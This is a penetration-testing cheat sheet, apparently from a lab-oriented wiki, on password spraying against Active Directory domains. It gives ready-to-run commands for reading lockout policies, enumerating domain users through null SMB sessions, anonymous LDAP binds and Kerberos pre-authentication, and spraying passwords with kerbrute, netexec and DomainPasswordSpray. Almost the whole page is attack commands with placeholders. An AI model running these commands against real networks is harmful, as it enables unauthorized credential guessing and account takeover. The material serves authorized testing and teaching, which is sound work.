# Password Spraying Attack

Try single passwords on all users, less chance of lockout.

## Policy Password

Important to obtain **password policy**, with:

<table data-header-hidden><thead><tr><th width="277"></th><th></th></tr></thead><tbody><tr><td><strong>Lockout threshold</strong></td><td>Possible attempts before being blocked</td></tr><tr><td><strong>Lockout duration</strong></td><td>Duration of the block</td></tr><tr><td><strong>Lockout observation window</strong></td><td>After how long does the reset of attempts occur</td></tr></tbody></table>

### Locally

{% code overflow="wrap" %}

```powershell
net accounts
```

{% endcode %}

{% code overflow="wrap" %}

```powershell
Get-ADDefaultDomainPasswordPolicy
```

{% endcode %}

### Remotely

<table><thead><tr><th width="161">Tool</th><th>Details</th></tr></thead><tbody><tr><td><a href="https://www.netexec.wiki/">netexec</a></td><td><code>nxc smb &#x3C;IP> -u &#x3C;USER> -p &#x3C;PASS> --pass-pol</code></td></tr><tr><td><a href="https://github.com/cddmp/enum4linux-ng">enum4linux</a></td><td><code>enum4linux -u &#x3C;USER> -p &#x3C;PASS> -P &#x3C;IP></code></td></tr></tbody></table>

### Null Session SMB

<table><thead><tr><th width="161">Tool</th><th>Details</th></tr></thead><tbody><tr><td><a href="https://www.netexec.wiki/">netexec</a></td><td><code>nxc smb &#x3C;IP> --pass-pol</code></td></tr><tr><td><a href="https://github.com/cddmp/enum4linux-ng">enum4linux</a></td><td><code>enum4linux -P &#x3C;IP></code></td></tr></tbody></table>

### LDAP Anonymous Binds

<table><thead><tr><th width="150">Tool</th><th>Details</th></tr></thead><tbody><tr><td><a href="https://linux.die.net/man/1/ldapsearch">ldapsearch</a></td><td><em>ex. INLANEFREIGHT.LOCAL</em><br><code>ldapsearch -H ldap://&#x3C;IP> -x -b "DC=INLANEFREIGHT,DC=LOCAL" -s sub "*" | grep -m 1 -B 10 pwdHistoryLength</code></td></tr></tbody></table>

## Find Usernames

### Locally

{% code overflow="wrap" %}

```powershell
net user /domain
```

{% endcode %}

### Remotely

<table><thead><tr><th width="161">Tool</th><th>Details</th></tr></thead><tbody><tr><td><a href="https://www.netexec.wiki/">netexec</a></td><td><code>nxc smb &#x3C;IP> -u &#x3C;USER> -p &#x3C;PASS> --users --rid-brute</code></td></tr><tr><td><a href="https://github.com/cddmp/enum4linux-ng">enum4linux</a></td><td><code>enum4linux -u &#x3C;USER> -p &#x3C;PASS> -U &#x3C;IP></code></td></tr></tbody></table>

### Null Session SMB

<table><thead><tr><th width="161">Tool</th><th>Details</th></tr></thead><tbody><tr><td><a href="https://www.netexec.wiki/">netexec</a></td><td><code>nxc smb &#x3C;IP> --users</code></td></tr><tr><td><a href="https://github.com/cddmp/enum4linux-ng">enum4linux</a></td><td><code>enum4linux -U &#x3C;IP></code></td></tr></tbody></table>

### LDAP Anonymous Binds

<table><thead><tr><th width="158">Tool</th><th>Details</th></tr></thead><tbody><tr><td><a href="https://linux.die.net/man/1/ldapsearch">ldapsearch</a></td><td><em>ex. INLANEFREIGHT.LOCAL</em><br><code>ldapsearch -h &#x3C;IP> -x -b "DC=INLANEFREIGHT,DC=LOCAL" -s sub "(&#x26;(objectclass=user))" | grep sAMAccountName: | cut -f 2 -d " "</code></td></tr><tr><td><a href="https://github.com/ropnop/windapsearch">windapsearch</a></td><td><code>windapsearch.py --dc-ip &#x3C;IP> -u "" -U</code></td></tr></tbody></table>

### Brute Force

<table><thead><tr><th width="158">Tool</th><th>Details</th></tr></thead><tbody><tr><td><a href="https://github.com/ropnop/kerbrute">kerbrute</a></td><td>Use <a href="https://ldapwiki.com/wiki/Wiki.jsp?page=Kerberos%20Pre-Authentication">Kerberos Pre-Authentication</a> to enumerate users via brute force (no login errors and no lockouts).<br><code>kerbrute userenum -d &#x3C;DOMAIN> --dc &#x3C;IP_DC> &#x3C;WORDLIST></code></td></tr></tbody></table>

## Spraying Attack

<table><thead><tr><th width="158">Tool</th><th>Details</th></tr></thead><tbody><tr><td><a href="https://github.com/ropnop/kerbrute">kerbrute</a></td><td>This method is based on obtaining TGT for credential verification. The advantage is that it uses only two UDP frames (sends REQ-TGT and examines the response)<br><code>kerbrute passwordspray -d &#x3C;DOMAIN> --dc &#x3C;DC_IP> &#x3C;USERS_LIST> &#x3C;PASS></code><br><em>If you receive a network error, make sure that the encoding of wordlist is ANSI. You can use Notepad's Save As functionality to change the encoding.</em></td></tr><tr><td><a href="https://www.netexec.wiki/">netexec</a></td><td>This method uses the SMB protocol to verify credentials (more traffic and slower).<br><code>nxc smb &#x3C;IP> -u &#x3C;USERS_LIST> -p &#x3C;PASS1> &#x3C;PASS2> -d &#x3C;DOMAIN> --continue-on-success | grep +</code></td></tr><tr><td><a href="https://github.com/dafthack/DomainPasswordSpray">DomainPasswordSpray</a></td><td>From <strong>Windows</strong>, with the ability to extract the password policy itself (adapting the attack) and users if it is executed from hosts within the domain.<br><code>Import-Module .\DomainPasswordSpray.ps1</code><br><code>Invoke-DomainPasswordSpray -Password &#x3C;PASS> -ErrorAction SilentlyContinue [-UserList &#x3C;USERS> -Domain &#x3C;DOMAIN>]</code></td></tr></tbody></table>